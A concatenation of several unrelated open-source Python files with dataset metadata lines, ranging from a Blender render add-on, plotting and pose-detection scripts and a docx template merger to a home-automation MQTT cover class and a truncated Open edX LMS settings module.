for more details.") # This has to be called in the end of render due to possible memory leak RPRBLND-1635 # Important to call it in this function, not in __del__() self.engine.stop_render() # viewport render def view_update(self, context, depsgraph): """ Called when data is updated for viewport """ log('view_update', self.as_pointer()) try: # if there is no engine set, create it and do the initial sync engine_cls = viewport_engine_cls[depsgraph.scene.rpr.render_quality] if self.engine and type(self.engine) == engine_cls: self.engine.sync_update(context, depsgraph) return if self.engine: self.engine.stop_render() self.engine = engine_cls(self) self.engine.sync(context, depsgraph) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) def view_draw(self, context, depsgraph): """ called when viewport is to be drawn """ log('view_draw', self.as_pointer()) try: self.engine.draw(context) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) # view layer AOVs def update_render_passes(self, render_scene=None, render_layer=None): """ Update 'Render Layers' compositor node with active render passes info. Called by Blender. """ aovs = properties.view_layer.RPR_ViewLayerProperites.aovs_info cryptomatte_aovs = properties.view_layer.RPR_ViewLayerProperites.cryptomatte_aovs_info scene = render_scene if render_scene else bpy.context.scene layer = render_layer if render_scene else bpy.context.view_layer def do_register_pass(aov): pass_channel = aov['channel'] pass_name = aov['name'] pass_channels_size = len(pass_channel) # convert from channel to blender type blender_type = 'VALUE' if pass_channel in ('RGB', 'RGBA'): blender_type = 'COLOR' elif pass_channel in {'XYZ', 'UVA'}: blender_type = 'VECTOR' self.register_pass(scene, layer, pass_name, pass_channels_size, pass_channel, blender_type) for index, enabled in enumerate(layer.rpr.enable_aovs): if enabled: do_register_pass(aovs[index]) if layer.rpr.crytomatte_aov_material: for i in range(3): do_register_pass(cryptomatte_aovs[i]) if layer.rpr.crytomatte_aov_object: for i in range(3,6): do_register_pass(cryptomatte_aovs[i]) @bpy.app.handlers.persistent def on_version_update(*args, **kwargs): """ On scene loading update old RPR data to current version """ log("on_version_update") addon_version = bl_info['version'] if version_updater.is_scene_from_2_79(addon_version): version_updater.update_2_79_scene() @bpy.app.handlers.persistent def on_save_pre(*args, **kwargs): """ Handler on saving a blend file (before) """ log("on_save_pre") # Save current plugin version in scene bpy.context.scene.rpr.saved_addon_version = bl_info['version'] @bpy.app.handlers.persistent def on_load_pre(*args, **kwargs): """ Handler on loading a blend file (before) """ log("on_load_pre") utils.clear_temp_dir() def register(): """ Register all addon classes in Blender """ log("register") install_libs.ensure_boto3() bpy.utils.register_class(RPREngine) material_library.register() properties.register() operators.register() nodes.register() ui.register() bpy.app.handlers.save_pre.append(on_save_pre) bpy.app.handlers.load_pre.append(on_load_pre) bpy.app.handlers.version_update.append(on_version_update) def unregister(): """ Unregister all addon classes from Blender """ log("unregister") bpy.app.handlers.version_update.remove(on_version_update) bpy.app.handlers.load_pre.remove(on_load_pre) bpy.app.handlers.save_pre.remove(on_save_pre) ui.unregister() nodes.unregister() operators.unregister() properties.unregister() material_library.unregister() bpy.utils.unregister_class(RPREngine)
1.546875
2
plot_metric_err_vs_dim.py
wchen459/design_embeddings_jmd_2016
9
16734
""" Plots reconstruction error vs semantic space dimensionality Usage: python metric_err_vs_dim.py Author(s): <NAME> (<EMAIL>) """ import matplotlib.pyplot as plt import numpy as np plt.rc("font", size=18) examples = ['glass', 'sf_linear', 'sf_s_nonlinear', 'sf_v_nonlinear'] titles = {'glass': 'Glass', 'sf_linear': 'Superformula (linear)', 'sf_s_nonlinear': 'Superformula (slightly nonlinear)', 'sf_v_nonlinear': 'Superformula (very nonlinear)'} n = len(examples) x = range(1, 6) for i in range(n): plt.figure() plt.xticks(np.arange(min(x), max(x)+1, dtype=np.int)) plt.xlabel('Semantic space dimensionality') plt.ylabel('Reconstruction error') plt.xlim(0.5, 5.5) errs = np.zeros((3,5)) for j in x: # Read reconstruction errors in rec_err.txt txtfile = open('./results/'+examples[i]+'/n_samples = 115/n_control_points = 20/semantic_dim = ' +str(j)+'/rec_err.txt', 'r') k = 0 for line in txtfile: errs[k, j-1] = float(line) k += 1 line_pca, = plt.plot(x, errs[0], '-ob', label='PCA') line_kpca, = plt.plot(x, errs[1], '-vg', label='Kernel PCA') line_ae, = plt.plot(x, errs[2], '-sr', label='Autoencoder') plt.legend(handles=[line_pca, line_kpca, line_ae], fontsize=16) plt.title(titles[examples[i]]) fig_name = 'err_vs_dim_'+examples[i]+'.png' plt.tight_layout() plt.savefig('./results/'+fig_name, dpi=300) print fig_name+' saved!'
2.265625
2
tools/pot/openvino/tools/pot/graph/gpu_patterns.py
ryanloney/openvino-1
1,127
16735
# Copyright (C) 2020-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 from .pattern_utils import check_fused_scale_shift_patterns, get_fused_scale_shift_patterns, \ check_fused_op_const_patterns, get_fused_op_const_pattern, get_clamp_mult_const_pattern def get_gpu_ignored_patterns(): return { 'blocks': [(pattern, check_fused_scale_shift_patterns) for pattern in get_fused_scale_shift_patterns()] + [(pattern, check_fused_op_const_patterns) for pattern in get_fused_op_const_pattern()], 'activations': [get_clamp_mult_const_pattern()], 'inputs': [] }
1.679688
2
test/environments/instances/8x8/gen.py
Multi-Agent-Research-Group/hog2
5
16736
<reponame>Multi-Agent-Research-Group/hog2<gh_stars>1-10 #!/usr/bin/python import random import os import errno for i in range(100): s=set() g=set() while len(s) < 50: s.add((random.randint(0,7),random.randint(0,7))) while len(g) < 50: g.add((random.randint(0,7),random.randint(0,7))) start=list(s) goal=list(g) for size in range(21,50): if not os.path.exists("./%d"%size): try: os.makedirs("./%d"%size) except OSError as exc: if exc.errno != errno.EEXIST: raise with open("./%d/%d.csv"%(size,i), "w") as f: for j in range(size): f.write("%d,%d %d,%d\n"%(start[j][0],start[j][1],goal[j][0],goal[j][1]))
2.4375
2
pose_recognition_from_camera_demo.py
amazingchow/capture-dance-using-mediapipe
0
16737
<gh_stars>0 # -*- coding: utf-8 -*- import argparse import cv2 as cv import mediapipe as mp import sys import time if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--video_device", type=int, default=0) parser.add_argument("--video_file", type=str, default="") args = parser.parse_args() mp_pose = mp.solutions.pose mp_drawing = mp.solutions.drawing_utils with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose: cap = object() if args.video_file != "": cap = cv.VideoCapture(args.video_file) else: cap = cv.VideoCapture(args.video_device) if not cap.isOpened(): print("Cannot open camera device-0") sys.exit(-1) else: print("Video <width: {}, height: {}, fps: {}>".format( cap.get(cv.CAP_PROP_FRAME_WIDTH), cap.get(cv.CAP_PROP_FRAME_HEIGHT), cap.get(cv.CAP_PROP_FPS) )) fps = int(cap.get(cv.CAP_PROP_FPS)) frame_idx = 0 while 1: ret, frame = cap.read() if not ret: print("Cannot receive frame, exiting ...") break frame_idx += 1 st = time.time() # flip the frame horizontally for a later selfie-view display frame = cv.cvtColor(cv.flip(frame, 1), cv.COLOR_BGR2RGB) # to improve performance, optionally mark the frame as not writeable to pass by reference frame.flags.writeable = False results = pose.process(frame) frame.flags.writeable = True frame = cv.cvtColor(frame, cv.COLOR_RGB2BGR) # draw the pose annotation on the frame mp_drawing.draw_landmarks(frame, results.pose_landmarks, mp_pose.POSE_CONNECTIONS) ed = time.time() print("Used {:.3f} secs to process frame-{:05}".format(ed - st, frame_idx)) gap = 1000//fps - int(1000 * (ed - st)) if gap < 5: gap = 5 cv.imshow("pose_recognition_from_camera_demo", frame) if cv.waitKey(gap) & 0xFF == 27: break cap.release() cv.destroyAllWindows()
2.4375
2
reference/data_dict_export.py
TBody/atomic1D
1
16738
# Program name: atomic1D/reference/build_json.py # Author: <NAME> # Author email: <EMAIL> # Date of creation: 14 July 2017 # # # Makes data_dict and copies it into a .json file 'sd1d-case-05.json' filename = 'sd1d-case-05' from boutdata.collect import collect data_dict = {} # Normalisation factor for temperature - T * Tnorm returns in eV data_dict["Tnorm"] = collect("Tnorm") # Normalisation factor for density - N * Nnorm returns in m^-3 data_dict["Nnorm"] = collect("Nnorm") # Plasma pressure (normalised). Pe = 2 Ne Te => P/Ne = Te (and assume Ti=Te) data_dict["P"] = collect("P") # Electron density (normalised) data_dict["Ne"] = collect("Ne") # Neutral density (normalised) data_dict["Nn"] = collect("Nn") # Help for user data_dict["help"] = "Contains outputs from Boutprojects/SD1D/case-05 example. Created with data_dict_export.py - stored in Github.com/TBody/atomic1D/reference" from copy import deepcopy import numpy as np import json # Need to 'jsonify' the numpy arrays (i.e. convert to nested lists) so that they can be stored in plain-text # Deep-copy data to a new dictionary and then edit that one (i.e. break the data pointer association - keep data_dict unchanged in case you want to run a copy-verify on it) data_dict_jsonified = deepcopy(data_dict) numpy_ndarrays = []; for key, element in data_dict.items(): if type(element) == np.ndarray: # Store which keys correspond to numpy.ndarray, so that you can de-jsonify the arrays when reading numpy_ndarrays.append(key) data_dict_jsonified[key] = data_dict_jsonified[key].tolist() data_dict_jsonified['numpy_ndarrays'] = numpy_ndarrays # Encode help # >> data_dict['help'] = 'help string' # <<Use original filename, except with .json instead of .dat extension>> with open('{}.json'.format(filename),'w') as fp: json.dump(data_dict_jsonified, fp, sort_keys=True, indent=4)
2.578125
3
wordDocComposite.py
flyonok/image2text
0
16739
<gh_stars>0 from docx import Document def CompositeTwoDocs(srcDocFullName, dstDocFullName, compositeName): ''' srcDocFullName:源文档,里面含有需要替换的内容 dstDocFullName:目标文档,执行后,相关模板内容被替换 compositeName:替换的对象名,比如正面或背面 return: 成功->True,失败->False ''' try: srcDoc = Document(srcDocFullName) dstDoc = Document(dstDocFullName) srcParasMap = {} # Heading 2 => [paras list] dstParasMap = {} # Heading 2 => [paras list] firstPage = False secondPage = False currentLabelStyleContent = None # 当前标签样式对应的内容 # 查找源文档的相关内容 for srcPara in srcDoc.paragraphs: if (srcPara.style.name.find('Heading 2') >= 0 and srcPara.text.find(compositeName) >= 0): print('find {0}'.format(srcPara)) firstPage = True elif (srcPara.style.name.find('Heading 2') >= 0 and firstPage): secondPage = True break else: if (firstPage and not secondPage): if (srcPara.style.name.find('Heading 3') >= 0): srcParasMap[srcPara.text] = [] currentLabelStyleContent = srcPara.text else: if currentLabelStyleContent is None: raise ValueError('不合格的word模板文档!') srcParasMap[currentLabelStyleContent].append(srcPara) firstPage = False secondPage = False currentLabelStyleContent = None # 当前标签样式对应的内容 # 查找目标文档的相关内容 for dstPara in dstDoc.paragraphs: if (dstPara.style.name.find('Heading 2') >= 0 and dstPara.text.find(compositeName) >= 0): print('find {0}'.format(dstPara)) firstPage = True elif (dstPara.style.name.find('Heading 2') >= 0 and firstPage): secondPage = True break else: if (firstPage and not secondPage): if (dstPara.style.name.find('Heading 3') >= 0): dstParasMap[dstPara.text] = [] currentLabelStyleContent = dstPara.text else: if currentLabelStyleContent is None: raise ValueError('不合格的word模板文档!') dstParasMap[currentLabelStyleContent].append(dstPara) # 开始组合 for key, dstParas in dstParasMap.items(): srcParas = srcParasMap[key] if len(srcParas) <= 0: print('源文档中没有该项--{0}--内容'.format(key)) continue else: for index, item in enumerate(dstParas): if (index <= len(srcParas)): dstParas[index].text = srcParas[index].text else: print('{0}中的长度--{1}--已经大于源文档的总长度--{2}'.format(key, index, len(srcParas))) dstDoc.save(dstDocFullName) except Exception as e: print('出现错误...') print(e) return False return True if __name__ == '__main__': srcDocFullName = r'D:\秒秒学人工智能平台\2020年8月\名片-111\名片-111.docx' dstDocFullName = r'D:\秒秒学人工智能平台\2020年8月\名片-456\名片-456.docx' CompositeTwoDocs(srcDocFullName, dstDocFullName, '正面')
2.6875
3
app/cover.py
mrwiwi/tydom2mqtt
26
16740
<filename>app/cover.py import json import time from datetime import datetime from sensors import sensor cover_command_topic = "cover/tydom/{id}/set_positionCmd" cover_config_topic = "homeassistant/cover/tydom/{id}/config" cover_position_topic = "cover/tydom/{id}/current_position" cover_set_postion_topic = "cover/tydom/{id}/set_position" cover_attributes_topic = "cover/tydom/{id}/attributes" class Cover: def __init__(self, tydom_attributes, set_position=None, mqtt=None): self.attributes = tydom_attributes self.device_id = self.attributes['device_id'] self.endpoint_id = self.attributes['endpoint_id'] self.id = self.attributes['id'] self.name = self.attributes['cover_name'] self.current_position = self.attributes['position'] self.set_position = set_position self.mqtt = mqtt # def id(self): # return self.id # def name(self): # return self.name # def current_position(self): # return self.current_position # def set_position(self): # return self.set_position # def attributes(self): # return self.attributes async def setup(self): self.device = {} self.device['manufacturer'] = 'Delta Dore' self.device['model'] = 'Volet' self.device['name'] = self.name self.device['identifiers'] = self.id self.config_topic = cover_config_topic.format(id=self.id) self.config = {} self.config['name'] = self.name self.config['unique_id'] = self.id # self.config['attributes'] = self.attributes self.config['command_topic'] = cover_command_topic.format(id=self.id) self.config['set_position_topic'] = cover_set_postion_topic.format( id=self.id) self.config['position_topic'] = cover_position_topic.format(id=self.id) self.config['json_attributes_topic'] = cover_attributes_topic.format( id=self.id) self.config['payload_open'] = "UP" self.config['payload_close'] = "DOWN" self.config['payload_stop'] = "STOP" self.config['retain'] = 'false' self.config['device'] = self.device # print(self.config) if (self.mqtt is not None): self.mqtt.mqtt_client.publish( self.config_topic, json.dumps( self.config), qos=0) # setup_pub = '(self.config_topic, json.dumps(self.config), qos=0)' # return(setup_pub) async def update(self): await self.setup() try: await self.update_sensors() except Exception as e: print("Cover sensors Error :") print(e) self.position_topic = cover_position_topic.format( id=self.id, current_position=self.current_position) if (self.mqtt is not None): self.mqtt.mqtt_client.publish( self.position_topic, self.current_position, qos=0, retain=True) # self.mqtt.mqtt_client.publish('homeassistant/sensor/tydom/last_update', str(datetime.fromtimestamp(time.time())), qos=1, retain=True) self.mqtt.mqtt_client.publish( self.config['json_attributes_topic'], self.attributes, qos=0) print( "Cover created / updated : ", self.name, self.id, self.current_position) # update_pub = '(self.position_topic, self.current_position, qos=0, retain=True)' # return(update_pub) async def update_sensors(self): # print('test sensors !') for i, j in self.attributes.items(): # sensor_name = "tydom_alarm_sensor_"+i # print("name "+sensor_name, "elem_name "+i, "attributes_topic_from_device ",self.config['json_attributes_topic'], "mqtt",self.mqtt) if not i == 'device_type' or not i == 'id': new_sensor = None new_sensor = sensor( elem_name=i, tydom_attributes_payload=self.attributes, attributes_topic_from_device=self.config['json_attributes_topic'], mqtt=self.mqtt) await new_sensor.update() # def __init__(self, name, elem_name, tydom_attributes_payload, # attributes_topic_from_device, mqtt=None): async def put_position(tydom_client, device_id, cover_id, position): print(cover_id, 'position', position) if not (position == ''): await tydom_client.put_devices_data(device_id, cover_id, 'position', position) async def put_positionCmd(tydom_client, device_id, cover_id, positionCmd): print(cover_id, 'positionCmd', positionCmd) if not (positionCmd == ''): await tydom_client.put_devices_data(device_id, cover_id, 'positionCmd', positionCmd)
2.625
3
edx/config/lms/docker_run.py
openfun/learning-analytics-playground
1
16741
""" This is the default template for our main set of servers. This does NOT cover the content machines, which use content.py Common traits: * Use memcached, and cache-backed sessions * Use a MySQL 5.1 database """ # We intentionally define lots of variables that aren't used, and # want to import all variables from base settings files # pylint: disable=wildcard-import, unused-wildcard-import # Pylint gets confused by path.py instances, which report themselves as class # objects. As a result, pylint applies the wrong regex in validating names, # and throws spurious errors. Therefore, we disable invalid-name checking. # pylint: disable=invalid-name import datetime import dateutil from glob import glob import json import os from path import Path as path import pkgutil import platform from django.utils.translation import ugettext_lazy from django.conf import global_settings from celery_redis_sentinel import register from openedx.core.lib.logsettings import get_logger_config from path import Path as path from xmodule.modulestore.modulestore_settings import ( convert_module_store_setting_if_needed, update_module_store_settings, ) from ..common import * from .utils import Configuration, prefer_fun_video # Load custom configuration parameters from yaml files config = Configuration(os.path.dirname(__file__)) # edX has now started using "settings.ENV_TOKENS" and "settings.AUTH_TOKENS" everywhere in the # project, not just in the settings. Let's make sure our settings still work in this case ENV_TOKENS = config AUTH_TOKENS = config # SERVICE_VARIANT specifies name of the variant used, which decides what JSON # configuration files are read during startup. SERVICE_VARIANT = config("SERVICE_VARIANT", default=None) # CONFIG_ROOT specifies the directory where the JSON configuration # files are expected to be found. If not specified, use the project # directory. CONFIG_ROOT = path(config("CONFIG_ROOT", default=ENV_ROOT)) # CONFIG_PREFIX specifies the prefix of the JSON configuration files, # based on the service variant. If no variant is use, don't use a # prefix. CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else "" ################################ ALWAYS THE SAME ############################## RELEASE = config("RELEASE", default=None) DEBUG = False DEFAULT_TEMPLATE_ENGINE["OPTIONS"]["debug"] = False # IMPORTANT: With this enabled, the server must always be behind a proxy that # strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise, # a user can fool our server into thinking it was an https connection. # See # https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header # for other warnings. SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https") ###################################### CELERY ################################ CELERY_ALWAYS_EAGER = config("CELERY_ALWAYS_EAGER", default=False, formatter=bool) # Don't use a connection pool, since connections are dropped by ELB. BROKER_POOL_LIMIT = 0 BROKER_CONNECTION_TIMEOUT = 1 # For the Result Store, use the django cache named 'celery' CELERY_RESULT_BACKEND = config( "CELERY_RESULT_BACKEND", default="djcelery.backends.cache:CacheBackend" ) # When the broker is behind an ELB, use a heartbeat to refresh the # connection and to detect if it has been dropped. BROKER_HEARTBEAT = 60.0 BROKER_HEARTBEAT_CHECKRATE = 2 # Each worker should only fetch one message at a time CELERYD_PREFETCH_MULTIPLIER = 1 # Celery queues DEFAULT_PRIORITY_QUEUE = config( "DEFAULT_PRIORITY_QUEUE", default="edx.lms.core.default" ) HIGH_PRIORITY_QUEUE = config("HIGH_PRIORITY_QUEUE", default="edx.lms.core.high") LOW_PRIORITY_QUEUE = config("LOW_PRIORITY_QUEUE", default="edx.lms.core.low") HIGH_MEM_QUEUE = config("HIGH_MEM_QUEUE", default="edx.lms.core.high_mem") CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE CELERY_QUEUES = config( "CELERY_QUEUES", default={ DEFAULT_PRIORITY_QUEUE: {}, HIGH_PRIORITY_QUEUE: {}, LOW_PRIORITY_QUEUE: {}, HIGH_MEM_QUEUE: {}, }, formatter=json.loads, ) CELERY_ROUTES = "lms.celery.Router" # Force accepted content to "json" only. If we also accept pickle-serialized # messages, the worker will crash when it's running with a privileged user (even # if it's not the root user but a user belonging to the root group, which is our # case with OpenShift). CELERY_ACCEPT_CONTENT = ["json"] CELERYBEAT_SCHEDULE = {} # For scheduling tasks, entries can be added to this dict ########################## NON-SECURE ENV CONFIG ############################## # Things like server locations, ports, etc. STATIC_ROOT_BASE = path("/edx/app/edxapp/staticfiles") STATIC_ROOT = STATIC_ROOT_BASE STATIC_URL = "/static/" STATICFILES_STORAGE = config( "STATICFILES_STORAGE", default="lms.envs.fun.storage.CDNProductionStorage" ) CDN_BASE_URL = config("CDN_BASE_URL", default=None) MEDIA_ROOT = path("/edx/var/edxapp/media/") MEDIA_URL = "/media/" # DEFAULT_COURSE_ABOUT_IMAGE_URL specifies the default image to show for courses that don't provide one DEFAULT_COURSE_ABOUT_IMAGE_URL = config( "DEFAULT_COURSE_ABOUT_IMAGE_URL", default=DEFAULT_COURSE_ABOUT_IMAGE_URL ) PLATFORM_NAME = config("PLATFORM_NAME", default=PLATFORM_NAME) # For displaying on the receipt. At Stanford PLATFORM_NAME != MERCHANT_NAME, but PLATFORM_NAME is a fine default PLATFORM_TWITTER_ACCOUNT = config( "PLATFORM_TWITTER_ACCOUNT", default=PLATFORM_TWITTER_ACCOUNT ) PLATFORM_FACEBOOK_ACCOUNT = config( "PLATFORM_FACEBOOK_ACCOUNT", default=PLATFORM_FACEBOOK_ACCOUNT ) SOCIAL_SHARING_SETTINGS = config( "SOCIAL_SHARING_SETTINGS", default=SOCIAL_SHARING_SETTINGS, formatter=json.loads ) # Social media links for the page footer SOCIAL_MEDIA_FOOTER_URLS = config( "SOCIAL_MEDIA_FOOTER_URLS", default=SOCIAL_MEDIA_FOOTER_URLS, formatter=json.loads ) CC_MERCHANT_NAME = config("CC_MERCHANT_NAME", default=PLATFORM_NAME) EMAIL_BACKEND = config( "EMAIL_BACKEND", default="django.core.mail.backends.smtp.EmailBackend" ) EMAIL_FILE_PATH = config("EMAIL_FILE_PATH", default=None) EMAIL_HOST = config("EMAIL_HOST", default="localhost") EMAIL_PORT = config("EMAIL_PORT", default=25) # django default is 25 EMAIL_USE_TLS = config("EMAIL_USE_TLS", default=False) # django default is False HTTPS = config("HTTPS", default=HTTPS) SESSION_COOKIE_DOMAIN = config("SESSION_COOKIE_DOMAIN", default=None) SESSION_COOKIE_HTTPONLY = config( "SESSION_COOKIE_HTTPONLY", default=True, formatter=bool ) SESSION_COOKIE_SECURE = config( "SESSION_COOKIE_SECURE", default=SESSION_COOKIE_SECURE, formatter=bool ) SESSION_ENGINE = config("SESSION_ENGINE", default="redis_sessions.session") SESSION_SAVE_EVERY_REQUEST = config( "SESSION_SAVE_EVERY_REQUEST", default=SESSION_SAVE_EVERY_REQUEST, formatter=bool ) # Configuration to use session with redis # To use redis, change SESSION_ENGINE to "redis_sessions.session" SESSION_REDIS_HOST = config("SESSION_REDIS_HOST", default="redis") SESSION_REDIS_PORT = config("SESSION_REDIS_PORT", default=6379, formatter=int) SESSION_REDIS_DB = config("SESSION_REDIS_DB", default=1, formatter=int) SESSION_REDIS_PASSWORD = config("SESSION_REDIS_PASSWORD", default=None) SESSION_REDIS_PREFIX = config("SESSION_REDIS_PREFIX", default="session") SESSION_REDIS_SOCKET_TIMEOUT = config( "SESSION_REDIS_SOCKET_TIMEOUT", default=1, formatter=int ) SESSION_REDIS_RETRY_ON_TIMEOUT = config( "SESSION_REDIS_RETRY_ON_TIMEOUT", default=False, formatter=bool ) SESSION_REDIS = config( "SESSION_REDIS", default={ "host": SESSION_REDIS_HOST, "port": SESSION_REDIS_PORT, "db": SESSION_REDIS_DB, # db 0 is used for Celery Broker "password": SESSION_REDIS_PASSWORD, "prefix": SESSION_REDIS_PREFIX, "socket_timeout": SESSION_REDIS_SOCKET_TIMEOUT, "retry_on_timeout": SESSION_REDIS_RETRY_ON_TIMEOUT, }, formatter=json.loads, ) SESSION_REDIS_SENTINEL_LIST = config( "SESSION_REDIS_SENTINEL_LIST", default=None, formatter=json.loads ) SESSION_REDIS_SENTINEL_MASTER_ALIAS = config( "SESSION_REDIS_SENTINEL_MASTER_ALIAS", default=None ) REGISTRATION_EXTRA_FIELDS = config( "REGISTRATION_EXTRA_FIELDS", default=REGISTRATION_EXTRA_FIELDS, formatter=json.loads ) # Set the names of cookies shared with the marketing site # These have the same cookie domain as the session, which in production # usually includes subdomains. EDXMKTG_LOGGED_IN_COOKIE_NAME = config( "EDXMKTG_LOGGED_IN_COOKIE_NAME", default=EDXMKTG_LOGGED_IN_COOKIE_NAME ) EDXMKTG_USER_INFO_COOKIE_NAME = config( "EDXMKTG_USER_INFO_COOKIE_NAME", default=EDXMKTG_USER_INFO_COOKIE_NAME ) # Override feature by feature by whatever is being redefined in the settings.yaml file CONFIG_FEATURES = config("FEATURES", default={}, formatter=json.loads) FEATURES.update(CONFIG_FEATURES) LMS_BASE = config("LMS_BASE", default="localhost:8072") CMS_BASE = config("CMS_BASE", default="localhost:8082") LMS_ROOT_URL = config("LMS_ROOT_URL", default="http://{:s}".format(LMS_BASE)) LMS_INTERNAL_ROOT_URL = config("LMS_INTERNAL_ROOT_URL", default=LMS_ROOT_URL) SITE_NAME = config("SITE_NAME", default=LMS_BASE) ALLOWED_HOSTS = config( "ALLOWED_HOSTS", default=[LMS_BASE.split(":")[0]], formatter=json.loads ) if FEATURES.get("PREVIEW_LMS_BASE"): ALLOWED_HOSTS.append(FEATURES["PREVIEW_LMS_BASE"]) # allow for environments to specify what cookie name our login subsystem should use # this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can # happen with some browsers (e.g. Firefox) if config("SESSION_COOKIE_NAME", default=None): # NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this # being a str() SESSION_COOKIE_NAME = str(config("SESSION_COOKIE_NAME")) CACHE_REDIS_HOST = config("CACHE_REDIS_HOST", default="redis") CACHE_REDIS_PORT = config("CACHE_REDIS_PORT", default=6379, formatter=int) CACHE_REDIS_DB = config("CACHE_REDIS_DB", default=1, formatter=int) CACHE_REDIS_BACKEND = config( "CACHE_REDIS_BACKEND", default="django_redis.cache.RedisCache" ) CACHE_REDIS_URI = "redis://{}:{}/{}".format( CACHE_REDIS_HOST, CACHE_REDIS_PORT, CACHE_REDIS_DB ) CACHE_REDIS_CLIENT = config( "CACHE_REDIS_CLIENT", default="django_redis.client.DefaultClient" ) CACHES_DEFAULT_CONFIG = { "BACKEND": CACHE_REDIS_BACKEND, "LOCATION": CACHE_REDIS_URI, "OPTIONS": {"CLIENT_CLASS": CACHE_REDIS_CLIENT}, } if "Sentinel" in CACHE_REDIS_BACKEND: CACHES_DEFAULT_CONFIG["LOCATION"] = [(CACHE_REDIS_HOST, CACHE_REDIS_PORT)] CACHES_DEFAULT_CONFIG["OPTIONS"]["SENTINEL_SERVICE_NAME"] = config( "CACHE_REDIS_SENTINEL_SERVICE_NAME", default="mymaster" ) CACHES_DEFAULT_CONFIG["OPTIONS"]["REDIS_CLIENT_KWARGS"] = {"db": CACHE_REDIS_DB} CACHES = config( "CACHES", default={ "default": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "default"}), "general": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "general"}), "celery": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "celery"}), "mongo_metadata_inheritance": dict( CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "mongo_metadata_inheritance"} ), "openassessment_submissions": dict( CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "openassessment_submissions"} ), "loc_cache": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "edx_location_mem_cache", }, # Cache backend used by Django 1.8 storage backend while processing static files "staticfiles": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "edx_location_mem_cache", }, }, formatter=json.loads, ) # Email overrides DEFAULT_FROM_EMAIL = config("DEFAULT_FROM_EMAIL", default=DEFAULT_FROM_EMAIL) DEFAULT_FEEDBACK_EMAIL = config( "DEFAULT_FEEDBACK_EMAIL", default=DEFAULT_FEEDBACK_EMAIL ) ADMINS = config("ADMINS", default=ADMINS, formatter=json.loads) SERVER_EMAIL = config("SERVER_EMAIL", default=SERVER_EMAIL) TECH_SUPPORT_EMAIL = config("TECH_SUPPORT_EMAIL", default=TECH_SUPPORT_EMAIL) CONTACT_EMAIL = config("CONTACT_EMAIL", default=CONTACT_EMAIL) BUGS_EMAIL = config("BUGS_EMAIL", default=BUGS_EMAIL) PAYMENT_SUPPORT_EMAIL = config("PAYMENT_SUPPORT_EMAIL", default=PAYMENT_SUPPORT_EMAIL) FINANCE_EMAIL = config("FINANCE_EMAIL", default=FINANCE_EMAIL) UNIVERSITY_EMAIL = config("UNIVERSITY_EMAIL", default=UNIVERSITY_EMAIL) PRESS_EMAIL = config("PRESS_EMAIL", default=PRESS_EMAIL) # Currency PAID_COURSE_REGISTRATION_CURRENCY = config( "PAID_COURSE_REGISTRATION_CURRENCY", default=["EUR", u"\N{euro sign}"] ) # Payment Report Settings PAYMENT_REPORT_GENERATOR_GROUP = config( "PAYMENT_REPORT_GENERATOR_GROUP", default=PAYMENT_REPORT_GENERATOR_GROUP ) # Bulk Email overrides BULK_EMAIL_DEFAULT_FROM_EMAIL = config( "BULK_EMAIL_DEFAULT_FROM_EMAIL", default=BULK_EMAIL_DEFAULT_FROM_EMAIL ) BULK_EMAIL_EMAILS_PER_TASK = config( "BULK_EMAIL_EMAILS_PER_TASK", default=BULK_EMAIL_EMAILS_PER_TASK, formatter=int ) BULK_EMAIL_DEFAULT_RETRY_DELAY = config( "BULK_EMAIL_DEFAULT_RETRY_DELAY", default=BULK_EMAIL_DEFAULT_RETRY_DELAY, formatter=int, ) BULK_EMAIL_MAX_RETRIES = config( "BULK_EMAIL_MAX_RETRIES", default=BULK_EMAIL_MAX_RETRIES, formatter=int ) BULK_EMAIL_INFINITE_RETRY_CAP = config( "BULK_EMAIL_INFINITE_RETRY_CAP", default=BULK_EMAIL_INFINITE_RETRY_CAP, formatter=int, ) BULK_EMAIL_LOG_SENT_EMAILS = config( "BULK_EMAIL_LOG_SENT_EMAILS", default=BULK_EMAIL_LOG_SENT_EMAILS, formatter=bool ) BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS = config( "BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS", default=BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS, formatter=int, ) # We want Bulk Email running on the high-priority queue, so we define the # routing key that points to it. At the moment, the name is the same. # We have to reset the value here, since we have changed the value of the queue name. BULK_EMAIL_ROUTING_KEY = config("BULK_EMAIL_ROUTING_KEY", default=HIGH_PRIORITY_QUEUE) # We can run smaller jobs on the low priority queue. See note above for why # we have to reset the value here. BULK_EMAIL_ROUTING_KEY_SMALL_JOBS = LOW_PRIORITY_QUEUE # Theme overrides THEME_NAME = config("THEME_NAME", default=None) COMPREHENSIVE_THEME_DIR = path( config("COMPREHENSIVE_THEME_DIR", default=COMPREHENSIVE_THEME_DIR) ) # Marketing link overrides MKTG_URL_LINK_MAP = config("MKTG_URL_LINK_MAP", default={}, formatter=json.loads) SUPPORT_SITE_LINK = config("SUPPORT_SITE_LINK", default=SUPPORT_SITE_LINK) # Mobile store URL overrides MOBILE_STORE_URLS = config("MOBILE_STORE_URLS", default=MOBILE_STORE_URLS) # Timezone overrides TIME_ZONE = config("TIME_ZONE", default=TIME_ZONE) # Translation overrides LANGUAGES = config("LANGUAGES", default=LANGUAGES, 